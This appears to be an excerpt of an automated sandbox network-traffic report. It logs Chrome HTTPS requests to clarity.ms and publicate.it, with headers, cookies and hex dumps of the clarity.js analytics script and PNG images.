                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: c9 f8 89 a9 d5 d6 7b e3 27 b6 29 72 57 f6 24 d6 b7 31 26 22 5d cd fc fa 52 6f bc 77 32 af 6a 4d d1 f0 c8 b4 b5 35 cd e8 64 7c 09 aa fb 7a 6d 7d 7c bd 46 e9 51 bd d4 da b8 75 95 ab 12 77 06 87 54 1c a0 0c 45 e9 6a a9 b3 f5 f4 c9 93 3b ed 52 4a ce 2b ea bc 28 72 81 a9 9f ee c2 1b a7 75 f1 ce 46 ab 94 1b 00 e2 17 49 68 a7 87 f0 d2 6e 15 f9 bc da a8 54 17 6f ec 6e 1c 74 42 48 43 5a ba 32 2d d5 ca d6 ee f6 a5 54 7a e7 4e cf 47 f3 a1 a9 3c 6b 2f 8f 2e dc 92 b6 84 4e d3 46 ae b4 3f a7 c6 e7 cd 73 c5 67 d0 5c 04 43 aa 46 67 97 db 33 90 55 a3 3f 03 83 bf f0 21 20 d5 19 d1 c9 dc cf 5d 38 ff 25 30 f7 40 45 ca 78 d8 a1 3a ce d5 31 98 8e 50 33 f3 1b 63 fa 8c 81 ee 98 3b d6 c0 86 a0 d7 79 4e 94 21 34 1b b0 1b 21 b5 75 90 06 50 03 64 cc d0 b4 b4 6a f6 fa 51 60 a2 e6 49
                                                                                                                                                                                                        Data Ascii: {')rW$1&"]Row2jM5d|zm}|FQuwTEj;RJ+(ruFIhnTontBHCZ2-TzNG<k/.NF?sg\CFg3U?! ]8%0@Ex:1P3c;yN!4!uPdjQ`I
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: 71 18 5a 6b 2c 34 51 46 27 45 da d0 4c a7 82 a7 4c 18 d3 d9 05 8e e3 4c 18 23 30 60 c2 90 11 50 d8 f9 4e 85 58 9a b1 b2 31 18 87 41 97 be 6f 9d 83 07 d6 ba d8 28 b7 0e 75 bc 16 cd cc 1f 2f 21 d6 d2 03 b1 e7 e6 1c 88 5d 8b 22 6c 10 c8 78 65 6d 0c cf 01 24 64 88 58 98 f1 11 8f eb cf cd f5 96 e6 7a fd 19 0b 47 fe 7a 0d 42 3c d4 70 78 8f c5 9a 23 50 06 ec 50 ac 32 15 87 2a 29 b6 1f 3f 7d f2 74 ab 53 ae 6a 17 86 1a 03 02 b3 8d c3 30 44 90 33 1c 3b 5d ed 16 74 ec bb 58 e7 bb 3a 84 e3 49 99 d0 86 56 2b e8 76 05 ed 1a 85 f6 ea 01 22 29 bc bc 51 dc 7c 7a 70 2d d4 b1 31 be 1f 86 2e 84 f9 5a 84 4b b0 01 97 0a 6c 69 0b 19 a1 31 1a ab c2 30 34 c6 c7 e4 0d da c3 4f 17 5a 1f 3f 23 96 6a 42 eb eb ec e6 72 37 cb b2 ee f5 9d 9d eb 2d c8 76 93 37 a7 93 46 46 13 22 4c ec cc
                                                                                                                                                                                                        Data Ascii: qZk,4QF'ELLL#0`PNX1Ao(u/!]"lxem$dXzGzB<px#PP2*)?}tSj0D3;]tX:IV+v")Q|zp-1.ZKli104OZ?#jBr7-v7FF"L
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: 67 02 cd 70 08 46 63 94 87 b8 a6 a7 22 2e 29 0f 7e 2c b8 c4 93 ec f6 e1 54 a6 01 66 b0 7f f9 b5 2f 5f 38 77 01 0a fc 33 a2 8b ea 7e e1 dc 4b 7f f1 ca 2f bf fd 15 95 60 5e 41 54 3a 0a a0 bc 50 78 88 f6 2e ba 3a dd 2d 12 55 00 ae 80 ae df 01 ac 8a 6b 84 bb c2 e0 01 28 a7 64 05 e7 02 08 a1 4b d1 fc 8d ae 9d 8c 9f ac 1f f7 c7 fb f3 11 fc 2d 12 54 87 e4 47 24 3d 77 36 41 bd a2 77 50 02 e2 be 8a 54 88 6d 6e a0 c0 d5 b4 3f d7 eb 03 6f 05 0b 01 4e dd 93 9a 8b 11 ca 0d 8a 5b 1b db 97 d2 18 cd 43 02 9a a0 e8 2a dd 28 b5 4e 9f 3e 5c 5d ed 5e 02 82 8a 08 33 a5 7c ea d1 f8 39 8e b0 8f f7 b7 2a 26 00 bb 82 76 d0 39 38 28 e5 ce 47 a1 88 d6 c5 83 83 4e 59 03 c3 95 14 5a fb 0f af fa 70 f4 a7 e5 d6 ea 93 fb 1d 10 5d 62 78 3a 6c 1f ac b6 4a 55 27 6a 39 9f 1a 31 92 7c 34 d8
                                                                                                                                                                                                        Data Ascii: gpFc".)~,Tf/_8w3~K/`^AT:Px.:-Uk(dK-TG$=w6AwPTmn?oN[C*(N>\]^3|9*&v98(GNYZp]bx:lJU'j91|4
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: 54 18 a8 68 1c 0d 26 2e cd 56 96 bb 59 9a 64 2b cb 2b 25 74 8c 50 10 a9 9e 25 dc 13 0a 16 36 1c dd 74 f8 89 70 90 67 2d b5 96 af 67 80 b6 79 e1 5f 7d fd 8b 24 fa 85 df 22 fa b9 73 2f 9f ff d2 07 7f 7b e9 b2 f2 54 9a 2a a4 68 20 68 0a e4 0c 41 a8 60 ef 09 50 af 5a 47 2a 8a 3c c6 d2 18 35 81 e6 96 7a 82 ef 82 15 2e c8 78 6a ed 39 92 96 1a b7 07 b7 31 81 52 f4 74 8a d0 13 c8 45 8a 0b 09 9a a5 ee 06 a8 0c ee 02 95 80 36 07 9f 03 4d a3 28 86 68 ab 9d 8c 1f 03 27 85 9d 7d 5c 43 76 8c ef 52 e0 a1 e7 c7 8f 23 c7 a9 d4 49 91 e9 05 da 07 b2 4f 3b 74 ea d2 4b dd d5 8d 6e 7b e3 a0 5d 48 39 1a ca f0 88 3e 19 04 8a 22 3f 2d 74 ee 1c 6d d5 53 d1 56 c9 9d 12 12 3d 11 45 2e 50 41 e2 80 a4 41 58 25 42 83 44 57 81 94 2b 26 41 52 dc dc 85 7f ce 21 00 00 20 00 49 44 41 54 dd
                                                                                                                                                                                                        Data Ascii: Th&.VYd++%tP%6tpg-gy_}$"s/{T*h hA`PZG*<5z.xj91RtE6M(h'}\CvR#IO;tKn{]H9>"?-tmSV=E.PAAX%BDW+&AR! IDAT
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: ec 01 54 78 e7 01 23 87 bb 70 30 18 0d c3 16 30 03 67 5a 3b ff c7 5b 97 b4 73 cf 88 0e fe 2e 44 a7 1e f7 51 21 7a 81 1c 46 1c 42 1e 00 b1 82 c6 12 87 08 7f 8b 73 48 3e fe b2 54 5f 07 66 5c ae b1 51 07 12 8b 8f 51 36 c0 04 72 2c 05 96 93 e4 41 e5 02 42 38 77 9e d2 20 21 7a d1 48 a1 0c 0a 13 19 44 ef f1 5d e4 8d cc 8d f7 6d 93 e0 3a ec f1 66 bf 67 e0 3c 54 1e 57 43 13 b7 90 cd 5b bc b3 8a 58 3a 7a c3 0e 4a f5 d8 dd a7 5b 45 c2 2a a0 1e a7 40 cf f3 ca 3c 87 a4 a1 eb 9b 1b ab db 15 48 29 42 c0 78 47 e5 06 8a 5c 00 8b 05 b2 43 57 eb b7 f6 5b d8 7c 80 a3 f3 29 1b f5 5b 47 db 85 ca d6 46 1b dd 57 b5 ae 16 b7 8f ee 8c 51 d4 3c 83 0e 8a 92 95 83 c5 06 30 ec bc 81 8c 86 09 02 7c 1a 79 66 cf a4 3a 9b 58 1c a5 10 4a b2 a9 e5 89 89 7b 37 3b e5 6a aa 7c 93 84 a3 93 cb
                                                                                                                                                                                                        Data Ascii: Tx#p00gZ;[s.DQ!zFBsH>T_f\QQ6r,AB8w !zHD]m:fg<TWC[X:zJ[E*@<H)BxG\CW[|)[GFWQ<0|yf:XJ{7;j|
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: 8b 9b f0 3b 44 66 06 4b 5a a2 83 e4 4c 6c 0b 74 f4 40 76 3e f3 e9 30 28 08 21 c1 5e c0 e1 73 9f 0f dd af 68 e1 c3 74 3e bb 23 d1 25 ca 67 62 44 0d 66 68 6d a6 b7 a4 a2 a8 b7 d4 14 c5 25 1a 59 1a 9f 6f 32 3d 98 ed 3d 5d b9 b5 da 2a 20 48 a2 ad f5 03 3a 4a 52 54 21 29 22 6d c0 17 97 32 9d e0 4a 87 95 ed c7 47 77 5a 88 a9 60 34 78 a8 41 e8 10 37 55 43 08 ad 86 94 be 34 d8 da 1b 77 8a 11 6f 94 2f 1b 4f ab ca e9 c1 d8 f6 ea c6 d1 8d 4b 9e 12 4c 65 1e 49 96 46 90 8d 83 9c 24 26 78 e6 dd e7 15 2f a4 08 49 8e 81 38 33 81 c5 38 ce 66 a1 bd 0f 68 91 96 da 8b 3b d7 af 1f 2e 4f bb 19 a5 55 36 b9 d0 1e 96 91 49 00 2f cf 40 14 7e 01 44 ec 68 52 bc f6 eb 77 de fa 1d a2 e7 31 b6 7c a7 43 ed be a8 a4 40 0c c3 63 40 55 43 96 e5 48 52 49 04 44 04 c5 47 a9 04 fe 94 ab 3e 52
                                                                                                                                                                                                        Data Ascii: ;DfKZLlt@v>0(!^sht>#%gbDfhm%Yo2==]* H:JRT!)"m2JGwZ`4xA7UC4wo/OKLeIF$&x/I838fh;.OU6I/@~DhRw1|C@c@UCHRIDG>R


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        132192.168.2.54992013.107.246.454436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC422OUTGET /s/0.7.45/clarity.js HTTP/1.1
                                                                                                                                                                                                        Host: www.clarity.ms
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: CLID=c33b4f75fae844d6b05821f811173c55.20240830.20250830
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC619INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:27 GMT
                                                                                                                                                                                                        Content-Type: application/javascript;charset=utf-8
                                                                                                                                                                                                        Content-Length: 65276
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Last-Modified: Wed, 28 Aug 2024 19:57:49 GMT
                                                                                                                                                                                                        ETag: "0x8DCC79BB1C5F66A"
                                                                                                                                                                                                        x-ms-request-id: ff5b1345-401e-0078-20ef-f98d23000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        x-azure-ref: 20240830T161627Z-16579567576rhxz5kgqdm3tfq000000003n000000000s70h
                                                                                                                                                                                                        Cache-Control: public, max-age=86400
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 51562430
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC15765INData Raw: 2f 2a 20 63 6c 61 72 69 74 79 2d 6a 73 20 76 30 2e 37 2e 34 35 3a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6d 69 63 72 6f 73 6f 66 74 2f 63 6c 61 72 69 74 79 20 28 4c 69 63 65 6e 73 65 3a 20 4d 49 54 29 20 2a 2f 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 5f 5f 70 72 6f 74 6f 5f 5f 3a 6e 75 6c 6c 2c 67 65 74 20 71 75 65 75 65 28 29 7b 72 65 74 75 72 6e 20 73 72 7d 2c 67 65 74 20 73 74 61 72 74 28 29 7b 72 65 74 75 72 6e 20 63 72 7d 2c 67 65 74 20 73 74 6f 70 28 29 7b 72 65 74 75 72 6e 20 6c 72 7d 2c 67 65 74 20 74 72 61 63 6b 28 29 7b 72 65 74 75 72 6e 20 61 72 7d 7d 29 2c 65 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 5f 5f 70 72 6f
                                                                                                                                                                                                        Data Ascii: /* clarity-js v0.7.45: https://github.com/microsoft/clarity (License: MIT) */!function(){"use strict";var t=Object.freeze({__proto__:null,get queue(){return sr},get start(){return cr},get stop(){return lr},get track(){return ar}}),e=Object.freeze({__pro
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC16384INData Raw: 6c 2c 6d 65 74 61 64 61 74 61 3a 7b 61 63 74 69 76 65 3a 21 30 2c 73 75 73 70 65 6e 64 3a 21 31 2c 70 72 69 76 61 63 79 3a 66 2c 70 6f 73 69 74 69 6f 6e 3a 6e 75 6c 6c 2c 66 72 61 75 64 3a 64 2c 73 69 7a 65 3a 6e 75 6c 6c 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 61 3d 65 2e 64 61 74 61 2c 72 3d 65 2e 6d 65 74 61 64 61 74 61 2c 69 3d 72 2e 70 72 69 76 61 63 79 2c 6f 3d 61 2e 61 74 74 72 69 62 75 74 65 73 7c 7c 7b 7d 2c 75 3d 61 2e 74 61 67 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 3b 73 77 69 74 63 68 28 21 30 29 7b 63 61 73 65 20 50 74 2e 69 6e 64 65 78 4f 66 28 75 29 3e 3d 30 3a 76 61 72 20 63 3d 6f 2e 74 79 70 65 2c 73 3d 22 22 2c 6c 3d 5b 22 63 6c 61 73 73 22 2c 22 73 74 79 6c 65 22 5d 3b 4f 62 6a 65 63 74 2e 6b 65 79 73 28
                                                                                                                                                                                                        Data Ascii: l,metadata:{active:!0,suspend:!1,privacy:f,position:null,fraud:d,size:null}},function(t,e,n){var a=e.data,r=e.metadata,i=r.privacy,o=a.attributes||{},u=a.tag.toUpperCase();switch(!0){case Pt.indexOf(u)>=0:var c=o.type,s="",l=["class","style"];Object.keys(
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC16384INData Raw: 21 3d 3d 72 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 72 26 26 4b 6e 28 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 5a 6e 28 74 2c 65 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 65 26 26 28 65 3d 31 29 2c 6e 75 6c 6c 21 3d 3d 74 29 73 77 69 74 63 68 28 74 79 70 65 6f 66 20 74 29 7b 63 61 73 65 22 6e 75 6d 62 65 72 22 3a 72 65 74 75 72 6e 20 4d 61 74 68 2e 72 6f 75 6e 64 28 74 2a 65 29 3b 63 61 73 65 22 73 74 72 69 6e 67 22 3a 72 65 74 75 72 6e 20 4d 61 74 68 2e 72 6f 75 6e 64 28 70 61 72 73 65 46 6c 6f 61 74 28 74 2e 72 65 70 6c 61 63 65 28 47 6e 2c 22 22 29 29 2a 65 29 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 76 61 72 20 51 6e 3d 5b 22 74 69 74 6c 65 22 2c 22 61 6c 74 22 2c 22 6f 6e 6c 6f 61 64 22 2c 22 6f 6e 66 6f 63 75 73 22 2c 22 6f 6e 65 72 72
                                                                                                                                                                                                        Data Ascii: !==r&&"object"==typeof r&&Kn(r)}}function Zn(t,e){if(void 0===e&&(e=1),null!==t)switch(typeof t){case"number":return Math.round(t*e);case"string":return Math.round(parseFloat(t.replace(Gn,""))*e)}return null}var Qn=["title","alt","onload","onfocus","onerr
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC16384INData Raw: 28 6e 2c 22 7c 22 29 2e 63 6f 6e 63 61 74 28 61 29 3a 22 22 3b 74 20 69 6e 20 77 72 26 26 77 72 5b 74 5d 2e 69 6e 64 65 78 4f 66 28 69 29 3e 3d 30 7c 7c 28 62 72 3d 7b 63 6f 64 65 3a 74 2c 6e 61 6d 65 3a 6e 2c 6d 65 73 73 61 67 65 3a 61 2c 73 74 61 63 6b 3a 72 2c 73 65 76 65 72 69 74 79 3a 65 7d 2c 74 20 69 6e 20 77 72 3f 77 72 5b 74 5d 2e 70 75 73 68 28 69 29 3a 77 72 5b 74 5d 3d 5b 69 5d 2c 79 72 28 33 33 29 29 7d 76 61 72 20 53 72 2c 45 72 3d 7b 7d 2c 4f 72 3d 6e 65 77 20 53 65 74 2c 4e 72 3d 7b 7d 2c 54 72 3d 7b 7d 2c 4d 72 3d 7b 7d 2c 78 72 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 5f 72 28 29 7b 6a 72 28 29 7d 66 75 6e 63 74 69 6f 6e 20 49 72 28 74 29 7b 74 72 79 7b 76 61 72 20 65 3d 74 26 26 74 2e 6c 65 6e 67 74 68 3e 30 3f 74 2e 73 70 6c 69 74 28 2f
                                                                                                                                                                                                        Data Ascii: (n,"|").concat(a):"";t in wr&&wr[t].indexOf(i)>=0||(br={code:t,name:n,message:a,stack:r,severity:e},t in wr?wr[t].push(i):wr[t]=[i],yr(33))}var Sr,Er={},Or=new Set,Nr={},Tr={},Mr={},xr={};function _r(){jr()}function Ir(t){try{var e=t&&t.length>0?t.split(/
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC359INData Raw: 67 72 61 64 65 3a 65 74 2c 76 65 72 73 69 6f 6e 3a 6c 7d 29 2c 61 6f 3d 77 69 6e 64 6f 77 2c 72 6f 3d 22 63 6c 61 72 69 74 79 22 3b 66 75 6e 63 74 69 6f 6e 20 69 6f 28 29 7b 69 66 28 76 6f 69 64 20 30 21 3d 3d 61 6f 29 7b 69 66 28 61 6f 5b 72 6f 5d 26 26 61 6f 5b 72 6f 5d 2e 76 29 72 65 74 75 72 6e 20 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 45 72 72 6f 72 20 43 4c 30 30 31 3a 20 4d 75 6c 74 69 70 6c 65 20 43 6c 61 72 69 74 79 20 74 61 67 73 20 64 65 74 65 63 74 65 64 2e 22 29 3b 76 61 72 20 74 3d 61 6f 5b 72 6f 5d 26 26 61 6f 5b 72 6f 5d 2e 71 7c 7c 5b 5d 3b 66 6f 72 28 61 6f 5b 72 6f 5d 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 6e 3d 31 3b 6e 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 65 5b 6e
                                                                                                                                                                                                        Data Ascii: grade:et,version:l}),ao=window,ro="clarity";function io(){if(void 0!==ao){if(ao[ro]&&ao[ro].v)return console.warn("Error CL001: Multiple Clarity tags detected.");var t=ao[ro]&&ao[ro].q||[];for(ao[ro]=function(t){for(var e=[],n=1;n<arguments.length;n++)e[n


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        133192.168.2.549923104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC1128OUTGET /images/favicon.png HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0; _clck=137ejx4%7C2%7Cfor%7C0%7C1703; _clsk=1s3cw30%7C1725034585943%7C1%7C1%7Ct.clarity.ms%2Fcollect
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC743INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:28 GMT
                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                        Content-Length: 2479
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "9af-620aa1d1bd1e7"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7EyBgwqN38FuiIQM65GO8kGJA5Kus5VnpYQVb9Zxo9QviOcfn40UcS1qYLe2rXNyzm7s6W7rVTUKLkPyu4UnhdmCX%2FNU3EIPqqlT3YlGaqe%2BxHbz7tdbLb0KPJ6moA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615de69bd7ca0-EWR
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC626INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 05 de 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 34 38 20 37 39 2e 31 36 34 30 33 36 2c 20 32 30 31 39 2f 30 38 2f 31 33 2d 30 31 3a 30 36 3a 35 37 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44
                                                                                                                                                                                                        Data Ascii: PNGIHDR szzpHYs.#.#x?viTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RD
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC1369INData Raw: 2e 30 20 28 4d 61 63 69 6e 74 6f 73 68 29 22 20 78 6d 70 3a 43 72 65 61 74 65 44 61 74 65 3d 22 32 30 31 39 2d 31 31 2d 30 36 54 30 39 3a 34 37 3a 30 33 5a 22 20 78 6d 70 3a 4d 65 74 61 64 61 74 61 44 61 74 65 3d 22 32 30 31 39 2d 31 31 2d 30 36 54 30 39 3a 34 37 3a 30 33 5a 22 20 78 6d 70 3a 4d 6f 64 69 66 79 44 61 74 65 3d 22 32 30 31 39 2d 31 31 2d 30 36 54 30 39 3a 34 37 3a 30 33 5a 22 20 78 6d 70 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 33 31 30 33 36 63 64 63 2d 39 63 64 35 2d 34 39 36 36 2d 61 64 38 30 2d 62 33 38 66 31 63 38 31 65 65 63 38 22 20 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3d 22 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 64 66 30 36 33 61 32 66 2d 61 34 64 66 2d 39 35 34 65 2d
                                                                                                                                                                                                        Data Ascii: .0 (Macintosh)" xmp:CreateDate="2019-11-06T09:47:03Z" xmp:MetadataDate="2019-11-06T09:47:03Z" xmp:ModifyDate="2019-11-06T09:47:03Z" xmpMM:InstanceID="xmp.iid:31036cdc-9cd5-4966-ad80-b38f1c81eec8" xmpMM:DocumentID="adobe:docid:photoshop:df063a2f-a4df-954e-
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC484INData Raw: d7 ac 30 7d e7 04 58 9e e8 a5 2e 2c ce 1a a2 03 2d 29 63 3b 89 00 37 af 80 e5 2f 4f 8c e0 91 d9 51 83 7c 63 77 90 35 e1 d7 a7 4c 17 82 1d 05 d8 1d 29 63 bb 89 00 0f 97 80 2a 2c be b1 c7 54 c0 cf 11 cc 31 de 6f 8d 5b 83 4e f8 cb d1 a5 b7 d5 94 5d 5f 82 a0 7d 17 28 b6 94 b1 3d 44 80 37 e9 74 23 04 4d d4 46 92 6b dd 7d 9f 39 e0 a6 0e 34 c6 06 90 54 49 6a 61 27 ac fa 16 e8 9a 1f 43 20 57 59 b6 a2 37 b9 80 36 4a ac d4 6f 37 a6 1d c9 af 36 dc 49 83 cf 8c 18 82 94 5b 82 61 b1 d2 90 83 42 0e a3 b0 31 d3 7e d5 75 02 e4 6a cb 22 f4 26 4e 01 3e 3d b1 38 e4 3a 0e d1 c5 39 88 fe 9e 82 c8 af 09 58 0b f9 68 11 6a 2a 44 3d 93 38 7c a6 51 cc 10 04 1f 1c c3 b6 50 63 1d 30 d8 0d fe 8b 96 e4 66 0a dc 09 05 60 cf ab 3d 17 80 e7 a3 be 2c 63 83 01 20 dc 6b 33 26 a5 d2 c4 25 c0
                                                                                                                                                                                                        Data Ascii: 0}X.,-)c;7/OQ|cw5L)c*,T1o[N]_}(=D7t#MFk}94TIja'C WY76Jo76I[aB1~uj"&N>=8:9Xhj*D=8|QPc0f`=,c k3&%


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        134192.168.2.549926104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:27 UTC807OUTGET /images/template3-p-500.png HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0; _clck=137ejx4%7C2%7Cfor%7C0%7C1703; _clsk=1s3cw30%7C1725034585943%7C1%7C1%7Ct.clarity.ms%2Fcollect
                                                                                                                                                                                                        2024-08-30 16:16:28 UTC748INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:28 GMT
                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                        Content-Length: 97930
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "17e8a-620aa1d1dc5e9"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
